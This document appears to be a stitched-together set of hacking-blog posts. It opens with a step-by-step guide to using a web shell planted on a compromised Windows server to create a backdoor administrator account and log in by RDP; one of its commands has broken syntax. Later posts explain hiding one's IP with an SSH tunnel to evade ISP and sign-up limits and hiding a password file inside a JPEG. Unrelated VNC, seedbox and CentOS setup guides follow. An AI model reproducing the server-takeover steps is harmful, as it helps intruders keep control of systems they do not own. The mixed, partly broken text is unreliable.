windows Rooting System or how to gain RDP Access

Well this is diffirent from *Unix process there we use exploit here we use only commands
and yes if we are not able to execute those commands we can try some alternativ but still the possibilitys to work are really low....Am gonna explane why a bit later.....

What we need:
-Shell atteched on Some Site
-Server must be runing on Windows OS

We access our shell and go to the command console and we frist gonna check who we are:


whoami

This command is to check with what user we are running and its can show us like:


Administrator or SystAdmin

Thats good we are running like administrator cool letz see how many users have on the server:
Code:

net user

And we gonna see something like :


C:\Users\Administrator>net user

\\SERVER **********

----------------------------------------------------------
Administrator Guest Remote
__________________________________
Command Successfully executed.

So this means that there are like 3 users on the this server :
Administrator,Guest,Remote
So we can try to add a new user ex: Dark-X
Code:

net user Dark-X /add

This command is for adding user with password:
Code:

net user Username Password /add

when we execute this command we will get some windows saying:
Code:

___________________________
Command Successfully executed.

now letz check:


net user Dark-X

Will display something like this:


Username: Dark-X
Name: Dark-X

Last Time Online: XX:XX:XX-XX/XX
Local Group: *User

So we are in group user we need to be in Administrator or Remote to connect on Remote Desktop Connection so we type:
Code:

Net localgroup Dark-X Administrator /add

and we will see agaen this line:

Command Successfully executed.

If we see this that means that we have added our user to Administrators group now we can try to connect on RDP and access the whole server.
Windows RDP Starting:

Start Menu=>All Programs=>Accessories=>Remote Desktop Connection

Linux:


Open Terminal write: rdesktop -u Username -p Password IP

or


rdesktop IP

Terms and Definitons Every hacker must know

Hax0r                               Hacker
Uberhacker                          Good hacker
L33t Sp33k                          Replacing characters to avoid filters
Full disclosure                     Revealing vulnerabilities
Hacktivism                          Hacking for a cause
Suicide Hacker                      Hopes to be caught
Ethical Hacker                      Hacks for defensive purposes
Penetration Test                    Determine true security risks
Vulnerability Assessment            Basic idea of security levels
Vulnerabilty Researcher             Tracks down vulnerabilities
White hat                         Hacks with permission
Grey hat                            Believes in full disclosure
Black hat                           Hacks without permission
White Box                           A test everyone knows about
Grey Box                            A test with a very specific goal but unspecific means
Black Box                           A test no one knows is happening
Threat                   Potential event
Vulnerability                       Weakness
Exposure                           Accessibility
Exploit                             Act of attacking
TOE                                 Target of Evaluation
Rootkit                             Hides processes that create backdoors
Botnet                              Robot network that can be commanded remotely
Buffer Overflow                         Hijack the execution steps of a program
Shrinkwrap Code                      Reused code with vulnerabilities



@hackingtricksmaster

How to use SSH with PuTTY to hide your IP address?

If you have access to SSH on a remote server (dedicated server, vps or shell account), you can browse the internet over the IP address hiding your original IP address.
This can be useful for many scenarios like -
IP based authentication over dynamic IP:
In many cases for security reasons we use restrict access only to some selected IP addresses. For example, admin area of a blog, forum, billing system or help desk can be protected with IP based authentication.
But what if you are on dynamic IP? You can allow your users (or yourself) first to ssh to a server with static ip and then access your restricted web app over the ssh tunnel. Your restricted web app will get the remote server IP as the user IP.
Technical limitations related to shared/dynamic IP:
In many places (specially in Bangladesh) ISPs provide the clients only with dynamic or shared IP address. In some places access are limited by number of access per IP address.
For example, download services like RapidShare will not allow you to download a file when someone else is downloading a file over your shared IP. You can easily bypass such limits using this SSH Tunneling.
Just last night I had to use ssh tunneling to create a couple of Live IDs (passport.net) as Micro$oft was not allowing to create any from my local ISP IP :S
Being a cool geek:
Or you can use it just to surprise your friends (who actaully checks for your ip =P) by showing your domain on you email and forum posts ;)
Anyways… enough of possible “usage”. If you are reading this, I bet you already “need it” =P
Now to get straight into the tutorial.
What you need?
1. PuTTY SSH Client. (Can be downloaded from here.)
2. Firefox Web Browser. (Can be downloaded from here.)
3. SSH access to a unix/linux server. (Now thats something I can’t give you ;) )
Now, first run PuTTY. You should be on the “PuTTY Configuration” window. On the “Host Name (or IP address)” field, type the hostname or IP address of your remote server. And select “Connection type” as “SSH“. The port should get automatically selected to 22.

Then, in the left-hand menu, click on “SSH“. In “Protocol options“, tick “enable compression” and set your preferred SSH version to “2“.

Now expand the “SSH” menu and select the “Tunnels” sub-menu.

Now under the “Tunnels” menu (Options controlling SSH port forwarding), in the “Source port” field, type in a source port. Here I am using 4567. But you can use anything. Then select “Dynamic” as “Destination” and click the “Add” button.

After clicking the “Add” button the newly added forwarded port should get listed under “Forwarded ports” list.

Now, go back to the “Session” tab at the top of the menu, give the new connection a name (here i used My SSH Proxy) and click on the “Save” button.

Congrats! we are done with the PuTTY configuration.
From now on you can use this connection to login to your server. After login, you winn be able to use the connection as SSH Tunnel.
But before starting to browse internet using the IP address of the server, we need to configure firefox settings.
Lets fire up the fox and go to “Tools > Options…”

Now click the Advanced icon (on the upper-right of the dialog), and select the Network tab. Then click on the “Settings…” button.

This will brings up the “Connection Settings” dialog. On this dialog click the “Manual proxy configuration” radio button, then put the address 127.0.0.1 in the “SOCKS Host” field. In the “Port” field enter the port you used when configuring your SSH tunnel with Putty. In my case this port is 4567.

Click the “OK” buttons to accept your changes.
Done!
Now make sure you have already logged in to the server using the connection we created with PuTTY and start browsing with Firefox.
You can visit a IP address identifier site like WhatIsYourIp.com or Whois.com.bd to check which IP address firefox is showing.



Source of this article: http://www.dotcomunderground.com/blogs/2008/12/11/putty-ssh-tunnel-to-hide-ip/



@hackingtricksmaster

Yum Extender Application manager for centos

Yum Extender is available as a part of the CentOS Extras repository of CentOS 4. Install Yum Extender by typing the following command as root:

yum install yumex

---

Starting and using Yum Extender

After installing Yum Extender, you can access the software by clicking on the CentOS menu then navigating to System Tools. There you should see a menu item for Yum Extender. After selecting this menu item, you will be prompted to enter the root password. Yum Extender will start and will scan available repositories and installed packages. It will develop a list of packages that need updating, packages available for install, and packages available for removal.
There is a row of Buttons on the left side of Yum Extender to control the section of the program you will enter. Yum Extender starts in the Output Section. This section is where commands write their output.

How To Hide Message Under Images.....

It may seem known to many of you....

We can hide messages under pictures or combine any extensions files with other

extensions.

follow these steps :
1. Go to command prompt  

2. go to the location of files (files
should be located in the same
place eg. desktop)

3. use copy keyword
eg. i have to combine
Tajmahal.jpg and passwords.txt to
taj.jpg located at desktop 
>>run >>cmd >>c:......desktop>>
....desktop>copy /b tajmahal.jpg + passwords.txt taj.jpg

@hackingtricksmaster

How To Access Ubuntu VPS remotely using VncServer

Sometime it is very useful to Access VPS remotely and with GUI(Graphical User Interface)...

Here is the Tutorial How You can access your Ubuntu vps remotely...

First Login To your ssh client e.g. putty or console window
So now you are in the server's console and you can type in it these commands. You can type commands with or without sudo since you are logged in as root but I will type it like this. Each time you are prompted with question to type Y for yes or N for no type Y of course.

now type

sudo apt-get update

sudo apt-get upgrade

Install XFCE environment :

sudo apt-get install xfce4

With this we have installed XFCE Desktop Environment.

For GNOME installation the code is:

Code:

sudo apt-get install ubuntu-desktop

And for KDE the code is:

Code:

sudo apt-get install kubuntu-desktop

But in order to connect the server remotely we need VNC server installed so just type this command (there is no need to download anything):

Code:

sudo apt-get install vnc4server

And follow the instructions.

The next step is to create new user and give it sudo rights. We will name it normaluser and give it password (something easy to remember). I did it like this but there could be different ways of doing it.

Code:

adduser normaluser

When prompted for password type in password.

Code:

sudo adduser normaluser sudo

And with this normaluser has sudo rights.

Now using putty we have a console from which we can change settings on our VPS. I am not sure about this (since I didn't check it 100%) but it seams that you can't connect as root on Ubuntu/Debian using Putty. So that is the main reason why I created new user and added it sudo rights.

So when Putty prompts for user you will type normaluser and enter correct password for normaluser (not root)
Now here comes the tricky part (just a little bit tricky) . In order to access remotely VPS and get proper Desktop Environment we have to do this. First open Putty again (if you closed it open again and log in as normaluser) and type this command.

Code:

vi /home/normaluser/.vnc/xstartup

This will open text editor vi and open the file xstartup. Then press the Insert key on your Keyboard and you are ready to edit the file. Hold down Delete key on Keyboard until you delete everything.
The next step is to copy this code, then open Putty again and right click on the top left corner. With that you will paste the code inside the xstartup file using Putty. This is the code you need to copy and paste.

Code:

#!/bin/sh

# Uncomment the following two lines for normal desktop:

# unset SESSION_MANAGER

# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources

xsetroot -solid grey

vncconfig -iconic &

xterm -geometry 80×24+10+10 -ls -title “$VNCDESKTOP Desktop” &

startxfce4 &

# twm &

For GNOME xstartup you paste:

Code:

#!/bin/sh

# Uncomment the following two lines for normal desktop:

# unset SESSION_MANAGER

# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources

xsetroot -solid grey

vncconfig -iconic &

xterm -geometry 80×24+10+10 -ls -title “$VNCDESKTOP Desktop” &

startx

And for KDE the xstartup file looks like :

Code:

#!/bin/sh

# Uncomment the following two lines for normal desktop:

# unset SESSION_MANAGER

# exec /etc/X11/xinit/xinitrc

[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup

[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources

xsetroot -solid grey

vncconfig -iconic &

xterm -geometry 80×24+10+10 -ls -title “$VNCDESKTOP Desktop” &

startkde

Since I couldn't run GNOME or KDE on my VPS I will not post Screen Shots of it running. But when I tried to connect remotely I did get message that there is not enough hardware to run GNOME and proper Close button on my VNC screen. I think that means it works.

After that you should press Esc key on Keyboard and if you did everything properly it looks like this.

To save the file type this in Putty and hit Enter.

Code:

:x

OK, so we are almost there. Next step is to run vncserver with this command.

Code:

vncserver :3000

And server is up and running on VPS. Next step is to connect it remotely via TightVNC. You can download it from here . Just install the .exe file and run TightVNC Viewer.
When you run the viewer it looks like this.

The important part is to put server's address in this form XX:XX:XX:XX:8900 so it will connect using port 8900.
If we had typed this command

Code:

vncserver :1

Then the port would be 5901. What ever you type instead of number 1 the port will be changed into 5900 + that number . In my case I typed 3000 and the port is 8900 (5900+3000).

So when you hit Connect the Screen opens and it looks like this.

So we have classic Linux Terminal and we are almost there. Just type this command in the terminal.

Code:

startxfce4

And it will start so you will get this picture.

Weather you want to hit Close or click on Next it's up to you but once everything is finished XFCE looks like this.

So there you have it. XFCE on your VPS. For Debian I think the procedure is almost the same and for Centos there are some command line differences (apt-get becomes yum) . I will see about setting up GNOME and KDE some time later and make a tutorial about that too.

Edit: I've added GNOME and KDE.

This is how the GNOME session looks like. Even on VPS such as VPS3 it was possible to run it.

How to Install rTorrent/ruTorrent Seedbox on Ubuntu VPS

How To make Seedbox on VPS

This tutorial will guide you through the installation of libtorrent 0.13.0, rTorrent 0.9, and the ruTorrent Web UI (3.0) on a Debian or Ubuntu system. It has been tested with Debian 6 (x64) and Ubuntu 11.04 (x64).
To begin, access your VPS via SSH and run the following to update your platform and install some needed dependencies:

# apt-get update
# sudo apt-get install subversion build-essential automake libtool libcppunit-dev libcurl3-dev libsigc++-2.0-dev unzip unrar-free curl libncurses-dev
# apt-get install apache2 php5 php5-cli php5-curl

Enable scgi for Apache:

# apt-get install libapache2-mod-scgi
# ln -s /etc/apache2/mods-available/scgi.load /etc/apache2/mods-enabled/scgi.load

Install XMLRPC:

# mkdir /install;cd /install
# svn checkout http://xmlrpc-c.svn.sourceforge.net/svnroot/xmlrpc-c/stable xmlrpc-c
# cd xmlrpc-c
# ./configure --disable-cplusplus
# make
# make install

Intall libtorrent:

# cd /install
# wget http://vps6.net/src/libtorrent-0.13.0.tar.gz
# tar xvf libtorrent-0.13.0.tar.gz
# cd libtorrent-0.13.0
# ./autogen.sh
# ./configure
# make
# make install

Install rTorrent:

# cd /install
# wget http://vps6.net/src/rtorrent-0.9.0.tar.gz
# cd rtorrent-0.9.0
# ./autogen.sh
# ./configure --with-xmlrpc-c
# make
# make install
# ldconfig

Create required directories:

# mkdir /home/seeder1/rtorrent
# mkdir /home/seeder1/rtorrent/.session
# mkdir /home/seeder1/rtorrent/watch
# mkdir /home/seeder1/rtorrent/download

Setup .rtorrent.rc file (rTorrent config):

# cd ~/
# wget http://vps6.net/src/.rtorrent.rc
# cp .rtorrent.rc /home/seeder1/

(Edit the settings in .rtorrent.rc, like max upload/download speed, max connected peers, etc, as needed.)
Install rTorrent:

# cd /install
# wget http://vps6.net/src/rutorrent-3.0.tar.gz
# tar xvf rutorrent-3.0.tar.gz
# mv rutorrent /var/www
# wget http://vps6.net/src/plugins-3.0.tar.gz
# tar xvf plugins-3.0.tar.gz
# mv plugins /var/www/rutorrent
# rm -rf /var/www/rutorrent/plugins/darkpal
# chown -R www-data:www-data /var/www/rutorrent

Secure /rutorrent:

# a2enmod ssl
# a2enmod auth_digest
# a2enmod scgi

# openssl req $@ -new -x509 -days 365 -nodes -out /etc/apache2/apache.pem -keyout /etc/apache2/apache.pem
# chmod 600 /etc/apache2/apache.pem

# htdigest -c /etc/apache2/passwords seedbox seeder1

(Enter a password of your choice when prompted, you will use this to log in to the ruTorrent web UI.)

# cd /etc/apache2/sites-available/
# rm -rf default
# wget http://vps6.net/src/default

# a2ensite default-ssl
# /etc/init.d/apache2 reload

Install screen:

# apt-get install screen

Start rTorrent in a detached shell using screen:

# screen -fa -d -m rtorrent

(To start rtorrent automatically after reboots, add the above command to /etc/rc.local)

Setup is now complete! Access ruTorrent at http://xx.xx.xx.xx/rutorrent/ (replace xx.xx with your server's IP address). You should be greeted with a login prompt, where the username is "seeder1" and the password is the one you set above in the "secure /rutorrent" section.

Install apt in CentOS using yum ...

Successful install apt in centOS using yum

After So Many Afforts On Google ..
I Have Found A special Trick to Install apt in CentOS...

As My Far Experience
Ubuntu is GREAT, Debian Package (apt-get) is awsome!

So If You have CentOS VPS no need To worry.......

You can just install apt in Following Methods : 

Method 1:

Go to Terminal/ Login To ssh And Type Following

yum install apt

Sometimes it will not work probably when You are On VPS..

Method 2:

Install apt from the sources

# wget http://apt-rpm.org/releases/apt-0.5.15lorg3.tar.bz2
# tar -vxf apt-0.5.15lorg3.tar.bz2
# cd apt-0.5.15lorg3
# ./configure
# make
# make install

Method 3:

Install synaptic package manager

type following line

# yum install synaptic

 and press enter you will get 100% following result
and install apt

--------------------------------------------------------------------------------------------------------

Loading "installonlyn" plugin
Setting up Install Process
Setting up repositories
rpmforge 100% |=========================| 1.1 kB 00:00
base 100% |=========================| 1.1 kB 00:00
updates 100% |=========================| 951 B 00:00
addons 100% |=========================| 951 B 00:00
extras 100% |=========================| 1.1 kB 00:00
Reading repository metadata in from local files
primary.xml.gz 100% |=========================| 1.5 MB 00:04
################################################## 5921/5921
Parsing package install arguments
Resolving Dependencies
--> Populating transaction set with selected packages. Please wait.
---> Downloading header for synaptic to pack into transaction set.
synaptic-0.57.2-3.el5.rf. 100% |=========================| 28 kB 00:00
---> Package synaptic.i386 0:0.57.2-3.el5.rf set to be updated
--> Running transaction check
--> Processing Dependency: libapt-pkg-libc6.5-6.so.2 for package: synaptic
--> Processing Dependency: apt >= 0.5.4 for package: synaptic
--> Restarting Dependency Resolution with new changes.
--> Populating transaction set with selected packages. Please wait.
---> Downloading header for apt to pack into transaction set.
apt-0.5.15lorg3.2-1.el5.r 100% |=========================| 21 kB 00:00
---> Package apt.i386 0:0.5.15lorg3.2-1.el5.rf set to be updated
--> Running transaction check

Dependencies Resolved

=============================================================================
Package Arch Version Repository Size
=============================================================================
Installing:
synaptic i386 0.57.2-3.el5.rf rpmforge 1.6 M
Installing for dependencies:
apt i386 0.5.15lorg3.2-1.el5.rf rpmforge 2.5 M

Transaction Summary
=============================================================================
Install 2 Package(s)
Update 0 Package(s)
Remove 0 Package(s)

Total download size: 4.1 M
Is this ok [y/N]: y
Downloading Packages:
(1/2): synaptic-0.57.2-3. 100% |=========================| 1.6 MB 00:05
(2/2): apt-0.5.15lorg3.2- 100% |=========================| 2.5 MB 00:05
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
Installing: apt [1/2]warning: /etc/apt/rpmpriorities saved as /etc/apt/rpmpriorities.rpmorig
Installing: apt ######################### [1/2]
Installing: synaptic ######################### [2/2]

Installed: synaptic.i386 0:0.57.2-3.el5.rf
Dependency Installed: apt.i386 0:0.5.15lorg3.2-1.el5.rf
Complete!

Now apt-get works

 @hackingtricksmaster

Setting Up VNC Client For CentOS VPS Tutorial

If you try to find a tutorial on "How to Install a VNC on CentOS." Well, here is a guide for you!

How to Install VNC on CentOS 5.x?


On SSH enter this command:

   yum install update


  yum install vnc-server


If Asking for a Permission to Install a VNC Server then Press "y" (without quotas) and hit enter.

  yum install vnc


If Asking for a Permission to Install a VNC Server then Press "y" (without quotas) and hit enter again.

 yum groupinstall "GNOME Desktop Environment"


This will take long time(upto 20 - 30 minute - depend on your Server Internet speed)

yum install nano


Nano would usually be on your VPS already, this is just to make sure!

nano /etc/sysconfig/vncservers


Replace this file /etc/sysconfig/vncservers with:

VNCSERVERS="2:root" 
VNCSERVERARGS[1]="-geometry 640x480"


Next Command:

    vncserver


If this will asking for a enter your VNC Password then enter your root password(do not enter any other password otherwise your VNC not work or show a blank screen)

You will get this Line..

    New 'hostname.yourdomain.com:1 (root)' desktop is hostname.yourdomain.com:1

    Starting applications specified in /root/.vnc/xstartup
    Log file is /root/.vnc/hostname.yourdomain.com:1.log


Final Step:

 nano /root/.vnc/xstartup


Uncommant this two lines:
  :#unset SESSION_MANAGER 
   #exec /etc/X11/xinit/xinitrc


and change last line with this line:

   exec gnome-session &


kill ur VNCserver

    vncserver -kill :1


And restart it with:

   vncserver


You will get this:

    New 'hostname.yourdomain.com:1 (root)' desktop is hostname.yourdomain.com:1

    Starting applications specified in /root/.vnc/xstartup
    Log file is /root/.vnc/hostname.yourdomain.com:1.log



Done.... now you can access your VNC using your VPS Main

IP Address:
example: x.x.xx.x:Port


@hackingtricksmaster

Download Windows Movie Maker !!

Windows Movie Maker (formerly known as Windows Live Movie Maker, codenamed Sundance) is a freeware video editing software by Microsoft. It is a part of Windows Essentials software suite and offers the ability to create and edit videos as well as to publish them on SkyDrive, Facebook, YouTube, and Flickr.                                                  

 

 (1) Movie maker : Xp look for Windows Vista / 7 /8

 Click Here To DownLoad
Password :  hackingtricksmaster

(2)Latest Movie Maker (Movie Maker 2012)

DownLoad From Microsoft : Click Here


@hackingtricksmaster